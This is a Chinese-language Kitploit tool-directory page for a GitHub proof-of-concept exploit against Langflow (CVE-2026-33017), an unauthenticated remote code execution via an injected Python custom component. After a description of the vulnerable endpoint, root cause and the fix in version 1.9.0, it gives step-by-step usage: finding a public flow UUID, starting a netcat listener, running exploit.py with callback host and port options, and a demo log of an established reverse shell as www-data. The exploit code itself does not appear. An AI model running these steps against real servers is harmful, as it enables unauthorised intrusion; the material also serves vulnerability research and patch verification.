Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33017 — CVE-2026-33017 的 PoC 漏洞利用程序:通过恶意 Python Custom Component 注入,在 Langflow 中实现未经身份验证的远程代码执行,并内置反向 Shell 监听器。 | Kitploit
工具/GitHubGitHub/dynamo2k1/cve-2026-33017
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubdynamo2k1/cve-2026-33017

CVE-2026-33017

CVE-2026-33017 的 PoC 漏洞利用程序:通过恶意 Python Custom Component 注入,在 Langflow 中实现未经身份验证的远程代码执行,并内置反向 Shell 监听器。

查看仓库
41个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33017 — Langflow 未认证远程代码执行

作者: dynamo2k1
严重性: 严重
CVSSv3: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


概述

CVE-2026-33017 是 Langflow(一个用于可视化构建 LLM 应用和 AI 工作流的开源平台)中的一个严重未认证远程代码执行漏洞。

存在漏洞的端点 build_public_tmp 无需认证即可接受请求体中由攻击者提供的 data 字段。这使攻击者能够注入包含恶意 Python 自定义组件的完全自定义流程定义,其代码会在构建过程中于服务器上执行。

无需任何凭据,仅需要一个有效的公共流程 UUID。


受影响版本

状态版本
受影响Langflow < 1.9.0
已修复Langflow 1.9.0+

存在漏洞的端点

root@kitploit:~
POST /api/v1/build_public_tmp/{flow_id}/flow

该端点设计用于在无需认证的情况下构建公共(共享)流程。在受影响版本中,它同样接受请求体中由攻击者控制的 data 字段,并直接将其传入服务器端构建逻辑——包括自定义组件中嵌入的任何 Python 代码。


使用方法

前置条件

root@kitploit:~
pip install requests urllib3

步骤 1 — 查找公共流程 UUID

浏览目标 Langflow 实例,寻找共享/公共流程。UUID 会出现在 URL 中:

root@kitploit:~
https://target.com/playground/7d84d636-af65-42e4-ac38-26e867052c25
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                        this is the flow-id

步骤 2 — 设置监听器

root@kitploit:~
nc -lvnp 9001

步骤 3 — 执行漏洞利用

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001

或者使用内置的交互式监听器(无需单独的 nc):

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001 \
  --listen

参数选项


演示

root@kitploit:~
[*] Target: https://target.com/api/v1/build_public_tmp/<flow-id>/flow
[*] Callback: 10.10.15.28:9001
[*] HTTP 200
[!] SHELL ESTABLISHED FROM 10.x.x.x:36522

www-data@target:/var/lib/langflow$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

工作原理

  1. 攻击者识别出公共 Langflow 流程的 UUID(可在 playground URL 中看到)。
  2. 精心构造的 POST 请求注入一个在模块级别包含 Python 代码的恶意自定义组件。
  3. 在构建阶段,Langflow 编译组件代码——在任何方法被调用之前就执行攻击者的载荷。
  4. 该代码向攻击者的监听器发起反向 Shell。

根本原因: build_public_tmp 信任请求体中的 data 字段,而不是仅使用服务器存储的流程定义。

修复措施: 在 Langflow 1.9.0 中,data 参数已从 build_public_tmp 中移除。外部流程定义无法再通过此端点注入。

补丁提交: 73b6612


参考资料

  • GitHub 安全公告 — GHSA-vwmf-pq79-vjvx
  • NVD — CVE-2026-33017
  • 补丁提交

免责声明

本 PoC 仅用于教育和授权安全研究目的。请仅对你拥有或已获得明确书面测试许可的系统使用。

下载工具
参数描述
--url目标 Langflow 基础 URL
--flow-id公共流程 UUID
--lhost用于反向 Shell 回连的 IP
--lport监听端口
--listen使用内置 Shell 处理器而非外部 nc
--timeoutHTTP 请求超时时间(秒),默认值:30